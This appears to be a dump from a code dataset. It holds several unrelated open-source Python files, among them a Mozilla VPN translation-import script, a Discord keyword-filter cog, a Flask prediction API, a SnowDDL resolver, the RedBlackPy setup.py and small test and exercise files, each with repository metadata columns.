l10n_files.append({
'locale': 'en',
'ts': os.path.join('translations', 'generated', 'mozillavpn_en.ts'),
'xliff': xliff_path
})
continue
tree = ET.parse(xliff_path)
root = tree.getroot()
sources = 0
translations = 0
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}source'):
sources += 1
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}target'):
translations += 1
completeness = translations/(sources*1.0)
# Ignore locale with less than 70% of completeness
if completeness < l10n_threshold:
print(f'KO\t- {locale} is translated at {round(completeness*100, 2)}%, at least {l10n_threshold*100}% is needed')
continue # Not enough translations next file please
print(f'OK\t- {locale} added ({round(completeness*100, 2)}% translated)')
l10n_files.append({
'locale': locale,
'ts': os.path.join('translations', 'generated', f'mozillavpn_{locale}.ts'),
'xliff': xliff_path
})
# Step 2
title("Create folders and localization files for the languages...")
for file in l10n_files:
locdirectory = os.path.join('translations', 'generated', file['locale'])
os.makedirs(locdirectory, exist_ok=True)
locversion = os.path.join(locdirectory, f'locversion.plist')
with open(locversion, 'w') as locversion_file:
locversion_file.write(f"""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>LprojCompatibleVersion</key>
<string>123</string>
<key>LprojLocale</key>
<string>{file['locale']}</string>
<key>LprojRevisionLevel</key>
<string>1</string>
<key>LprojVersion</key>
<string>123</string>
</dict>
</plist>""")
with open(os.path.join('translations', 'generated', 'macos.pri'), 'w') as macospri:
macospri.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
for file in l10n_files:
macospri.write(f"LANGUAGES_FILES_{file['locale']}.files += $$PWD/{file['locale']}/locversion.plist\n")
macospri.write(f"LANGUAGES_FILES_{file['locale']}.path = Contents/Resources/{file['locale']}.lproj\n")
macospri.write(f"QMAKE_BUNDLE_DATA += LANGUAGES_FILES_{file['locale']}\n\n")
# Step 3
title("Write resource file to import the locales that are ready...")
with open('translations/generated/translations.qrc', 'w') as qrcfile:
qrcfile.write('<!-- AUTOGENERATED! DO NOT EDIT!! -->\n')
qrcfile.write('<RCC>\n')
qrcfile.write(' <qresource prefix="/i18n">\n')
for file in l10n_files:
qrcfile.write(f' <file>mozillavpn_{file["locale"]}.qm</file>\n')
qrcfile.write(' </qresource>\n')
qrcfile.write('</RCC>\n')
# Step 4
title("Generate the Js/C++ string definitions...")
try:
subprocess.call([sys.executable, os.path.join('scripts', 'utils', 'generate_strings.py'),
'-o', os.path.join('translations', 'generated'),
os.path.join('translations', 'strings.yaml')])
except Exception as e:
print("generate_strings.py failed. Try with:\n\tpip3 install -r requirements.txt --user")
print(e)
exit(1)
# Build a dummy project to glob together everything that might contain strings.
title("Scanning for new strings...")
def scan_sources(projfile, dirpath):
projfile.write(f"HEADERS += $$files({dirpath}/*.h, true)\n")
projfile.write(f"SOURCES += $$files({dirpath}/*.cpp, true)\n")
projfile.write(f"RESOURCES += $$files({dirpath}/*.qrc, true)\n\n")
with open('translations/generated/dummy.pro', 'w') as dummyproj:
dummyproj.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
dummyproj.write(f"HEADERS += l18nstrings.h\n")
dummyproj.write(f"SOURCES += l18nstrings_p.cpp\n")
dummyproj.write(f"SOURCES += ../l18nstrings.cpp\n\n")
for l10n_file in l10n_files:
dummyproj.write(f"TRANSLATIONS += {os.path.basename(l10n_file['ts'])}\n")
dummyproj.write("\n")
scan_sources(dummyproj, '../../src')
scan_sources(dummyproj, '../../nebula')
# Step 5
title("Generate translation resources...")
for l10n_file in l10n_files:
os.system(f"{lconvert} -if xlf -i {l10n_file['xliff']} -o {l10n_file['ts']}")
os.system(f"{lupdate} translations/generated/dummy.pro")
for l10n_file in l10n_files:
os.system(f"{lrelease} -idbased {l10n_file['ts']}")
print(f'Imported {len(l10n_files)} locales')
git = os.popen(f'git submodule status i18n')
git_commit_hash = git.read().strip().replace("+","").split(' ')[0]
print(f'Current commit: https://github.com/mozilla-l10n/mozilla-vpn-client-l10n/commit/{git_commit_hash}')
| en | 0.662579 | #! /usr/bin/env python3 # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # Use the project root as the working directory # Include only locales above this threshold (e.g. 70%) in production # Step 0 # Step 0 # Let's update the i18n repo # Step 1 # Go through the i18n repo, check each XLIFF file and take # note which locale is complete above the minimum threshold. # Adds path of .xliff and .ts to l10n_files. # Skip non folders # Skip hidden folders # If it's the source locale (en), ignore parsing for completeness and # add it to the list. # Ignore locale with less than 70% of completeness # Not enough translations next file please # Step 2 <?xml version=\"1.0\" encoding=\"UTF-8\"?> <!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"> <plist version=\"1.0\"> <dict> <key>LprojCompatibleVersion</key> <string>123</string> <key>LprojLocale</key> <string>{file['locale']}</string> <key>LprojRevisionLevel</key> <string>1</string> <key>LprojVersion</key> <string>123</string> </dict> </plist> ## AUTOGENERATED! DO NOT EDIT!! ###\n') # Step 3 # Step 4 # Build a dummy project to glob together everything that might contain strings. ## AUTOGENERATED! DO NOT EDIT!! ###\n') # Step 5 | 2.087829 | 2 |
cogs/filter.py | Velgaster/Discord-User-Vote | 0 | 8587 | from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
| from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
| none | 1 | 2.389588 | 2 |
|
api/app.py | sai-krishna-msk/KickAssist | 0 | 8588 | <gh_stars>0
from ml_model.model import KickModel
import numpy as np
import pandas as pd
import eli5
import joblib
import flask
from flask import Flask, render_template, request, jsonify
app = Flask(__name__)
model_oh = joblib.load('ml_model/estimators/model_oh.sav')
model_hel = joblib.load('ml_model/estimators/model_hel.sav')
encoder_oh = joblib.load('ml_model/estimators/encoder_oh.sav')
encoder_hel = joblib.load('ml_model/estimators/encoder_hel.sav')
encoder_label = joblib.load('ml_model/estimators/encoder_label.sav')
def get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict={
"launched_at":launch_date,
"deadline":deadline_date,
"goal":int(goal),
"sub_category":subcategory,
"category":category,
"currency":currency,
"location_country":country,
"blurb":description,
"rewards":[]
}
try:
for reward in rewards.split(","):
pred_dict["rewards"].append(int(reward))
except Exception as e:
raise Exception(f"Error sanatizing rewards with {e} error")
return pred_dict
@app.route('/predict/<launch_date>/<deadline_date>/<goal>/<subcategory>/<category>/<currency>/<country>/<description>/<rewards>')
def GetURL(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict = get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards)
obj = KickModel(model_oh , model_hel , encoder_oh , encoder_hel , encoder_label)
obj.load_data(pred_dict)
obj.pred()
oh_pred = float(obj.pred_oh[0][1])
hel_pred = float(obj.pred_hel[0][1])
response = {
"prediction_oh":oh_pred,
"prediction_hel":hel_pred,
"prediction_oh_df":obj.pred_oh_intr.to_dict(),
"prediction_hel_intr":obj.pred_hel_intr.to_dict()
}
return response
if __name__=="__main__":
app.run(debug =True) | from ml_model.model import KickModel
import numpy as np
import pandas as pd
import eli5
import joblib
import flask
from flask import Flask, render_template, request, jsonify
app = Flask(__name__)
model_oh = joblib.load('ml_model/estimators/model_oh.sav')
model_hel = joblib.load('ml_model/estimators/model_hel.sav')
encoder_oh = joblib.load('ml_model/estimators/encoder_oh.sav')
encoder_hel = joblib.load('ml_model/estimators/encoder_hel.sav')
encoder_label = joblib.load('ml_model/estimators/encoder_label.sav')
def get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict={
"launched_at":launch_date,
"deadline":deadline_date,
"goal":int(goal),
"sub_category":subcategory,
"category":category,
"currency":currency,
"location_country":country,
"blurb":description,
"rewards":[]
}
try:
for reward in rewards.split(","):
pred_dict["rewards"].append(int(reward))
except Exception as e:
raise Exception(f"Error sanatizing rewards with {e} error")
return pred_dict
@app.route('/predict/<launch_date>/<deadline_date>/<goal>/<subcategory>/<category>/<currency>/<country>/<description>/<rewards>')
def GetURL(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards):
pred_dict = get_predict(launch_date , deadline_date , goal , subcategory , category , currency , country , description, rewards)
obj = KickModel(model_oh , model_hel , encoder_oh , encoder_hel , encoder_label)
obj.load_data(pred_dict)
obj.pred()
oh_pred = float(obj.pred_oh[0][1])
hel_pred = float(obj.pred_hel[0][1])
response = {
"prediction_oh":oh_pred,
"prediction_hel":hel_pred,
"prediction_oh_df":obj.pred_oh_intr.to_dict(),
"prediction_hel_intr":obj.pred_hel_intr.to_dict()
}
return response
if __name__=="__main__":
app.run(debug =True) | none | 1 | 2.687813 | 3 |
|
snowddl/resolver/primary_key.py | littleK0i/SnowDDL | 21 | 8589 | <reponame>littleK0i/SnowDDL
from snowddl.blueprint import PrimaryKeyBlueprint
from snowddl.resolver.abc_schema_object_resolver import AbstractSchemaObjectResolver, ResolveResult, ObjectType
class PrimaryKeyResolver(AbstractSchemaObjectResolver):
def get_object_type(self) -> ObjectType:
return ObjectType.PRIMARY_KEY
def get_existing_objects_in_schema(self, schema: dict):
existing_objects = {}
constraints_by_name = {}
cur = self.engine.execute_meta("SHOW PRIMARY KEYS IN SCHEMA {database:i}.{schema:i}", {
"database": schema['database'],
"schema": schema['schema'],
})
for r in cur:
if r['constraint_name'] not in constraints_by_name:
constraints_by_name[r['constraint_name']] = {
"database": r['database_name'],
"schema": r['schema_name'],
"table": r['table_name'],
"columns": {r['key_sequence']: r['column_name']}
}
else:
constraints_by_name[r['constraint_name']]['columns'][r['key_sequence']] = r['column_name']
for c in constraints_by_name.values():
columns_list = [c['columns'][k] for k in sorted(c['columns'])]
full_name = f"{c['database']}.{c['schema']}.{c['table']}({','.join(columns_list)})"
existing_objects[full_name] = {
"database": c['database'],
"schema": c['schema'],
"table": c['table'],
"columns": columns_list,
}
return existing_objects
def get_blueprints(self):
return self.config.get_blueprints_by_type(PrimaryKeyBlueprint)
def create_object(self, bp: PrimaryKeyBlueprint):
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.CREATE
def compare_object(self, bp: PrimaryKeyBlueprint, row: dict):
if [str(c) for c in bp.columns] == row['columns']:
return ResolveResult.NOCHANGE
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} DROP PRIMARY KEY", {
"table_name": bp.table_name,
})
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.ALTER
def drop_object(self, row: dict):
self.engine.execute_safe_ddl("ALTER TABLE {database:i}.{schema:i}.{table:i} DROP PRIMARY KEY", {
"database": row['database'],
"schema": row['schema'],
"table": row['table'],
})
return ResolveResult.DROP
| from snowddl.blueprint import PrimaryKeyBlueprint
from snowddl.resolver.abc_schema_object_resolver import AbstractSchemaObjectResolver, ResolveResult, ObjectType
class PrimaryKeyResolver(AbstractSchemaObjectResolver):
def get_object_type(self) -> ObjectType:
return ObjectType.PRIMARY_KEY
def get_existing_objects_in_schema(self, schema: dict):
existing_objects = {}
constraints_by_name = {}
cur = self.engine.execute_meta("SHOW PRIMARY KEYS IN SCHEMA {database:i}.{schema:i}", {
"database": schema['database'],
"schema": schema['schema'],
})
for r in cur:
if r['constraint_name'] not in constraints_by_name:
constraints_by_name[r['constraint_name']] = {
"database": r['database_name'],
"schema": r['schema_name'],
"table": r['table_name'],
"columns": {r['key_sequence']: r['column_name']}
}
else:
constraints_by_name[r['constraint_name']]['columns'][r['key_sequence']] = r['column_name']
for c in constraints_by_name.values():
columns_list = [c['columns'][k] for k in sorted(c['columns'])]
full_name = f"{c['database']}.{c['schema']}.{c['table']}({','.join(columns_list)})"
existing_objects[full_name] = {
"database": c['database'],
"schema": c['schema'],
"table": c['table'],
"columns": columns_list,
}
return existing_objects
def get_blueprints(self):
return self.config.get_blueprints_by_type(PrimaryKeyBlueprint)
def create_object(self, bp: PrimaryKeyBlueprint):
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.CREATE
def compare_object(self, bp: PrimaryKeyBlueprint, row: dict):
if [str(c) for c in bp.columns] == row['columns']:
return ResolveResult.NOCHANGE
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} DROP PRIMARY KEY", {
"table_name": bp.table_name,
})
self.engine.execute_safe_ddl("ALTER TABLE {table_name:i} ADD PRIMARY KEY ({columns:i})", {
"table_name": bp.table_name,
"columns": bp.columns,
})
return ResolveResult.ALTER
def drop_object(self, row: dict):
self.engine.execute_safe_ddl("ALTER TABLE {database:i}.{schema:i}.{table:i} DROP PRIMARY KEY", {
"database": row['database'],
"schema": row['schema'],
"table": row['table'],
})
return ResolveResult.DROP | none | 1 | 2.32121 | 2 |
|
modules/module0/02_datastructures_and_geometry/datastructures_2b.py | tetov/ITA19 | 7 | 8590 | import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| none | 1 | 2.585056 | 3 |
|
OOP/Exercises/First_steps_in_OOP_Exercises/8_pokemon/project/pokemon.py | tankishev/Python | 2 | 8591 | <reponame>tankishev/Python<filename>OOP/Exercises/First_steps_in_OOP_Exercises/8_pokemon/project/pokemon.py<gh_stars>1-10
# The Pokemon class should receive a name (string) and health (int) upon initialization.
# It should also have a method called pokemon_details that returns the information about the pokemon:
# "{pokemon_name} with health {pokemon_health}"
class Pokemon:
def __init__(self, name: str, health: int) -> None:
self.name = name
self.health = health
def pokemon_details(self) -> str:
return f"{self.name} with health {self.health}"
| # The Pokemon class should receive a name (string) and health (int) upon initialization.
# It should also have a method called pokemon_details that returns the information about the pokemon:
# "{pokemon_name} with health {pokemon_health}"
class Pokemon:
def __init__(self, name: str, health: int) -> None:
self.name = name
self.health = health
def pokemon_details(self) -> str:
return f"{self.name} with health {self.health}" | en | 0.927727 | # The Pokemon class should receive a name (string) and health (int) upon initialization. # It should also have a method called pokemon_details that returns the information about the pokemon: # "{pokemon_name} with health {pokemon_health}" | 3.724721 | 4 |
tests/test_pandas.py | ONSdigital/ons_utils | 0 | 8592 | """Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| """Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| en | 0.774217 | Tests for the pandas helpers in the pd_helpers.py module. Test for nested_dict_to_df. # Sort values as dict order not preserved. # Set index because function returns a MultiIndex. Group of tests for Stacker. Test for Stacker. Test for this. Group of tests for MultiIndexSlicer. Test for MultiIndexSlicer. Test for this. Test for this. Test for this. | 2.988523 | 3 |
lsf_ibutils/ibsub/__init__.py | seanfisk/lsf-ibutils | 0 | 8593 | <filename>lsf_ibutils/ibsub/__init__.py
""":mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility
"""
| <filename>lsf_ibutils/ibsub/__init__.py
""":mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility
"""
| en | 0.550865 | :mod:`lsf_ibutils.ibsub` -- Interactive batch submission utility | 1.08001 | 1 |
build/lib/configger/fishes/__init__.py | PaperDevil/pyconfigger | 2 | 8594 | <reponame>PaperDevil/pyconfigger<gh_stars>1-10
import os
splited_path = os.path.realpath(__file__).split('\\')[:-1]
fish_path = '\\'.join(splited_path)
fish_json_name = "fish.json"
fish_json_path = os.path.join(fish_path, fish_json_name)
| import os
splited_path = os.path.realpath(__file__).split('\\')[:-1]
fish_path = '\\'.join(splited_path)
fish_json_name = "fish.json"
fish_json_path = os.path.join(fish_path, fish_json_name) | none | 1 | 2.107305 | 2 |
|
setup.py | IntuitionEngineeringTeam/RedBlackPy | 12 | 8595 | #
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| #
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| en | 0.248138 | # # Created by <NAME>. # Copyright 2018 Intuition. All rights reserved. # #-------------------------------------------------------------------------------------------- # Generate cython code for all supporting types #-------------------------------------------------------------------------------------------- #-------------------------------------------------------------------------------------------- | 1.782742 | 2 |
source/accounts/views.py | kishan2064/hashpy1 | 0 | 8596 | from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME, get_user_model
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
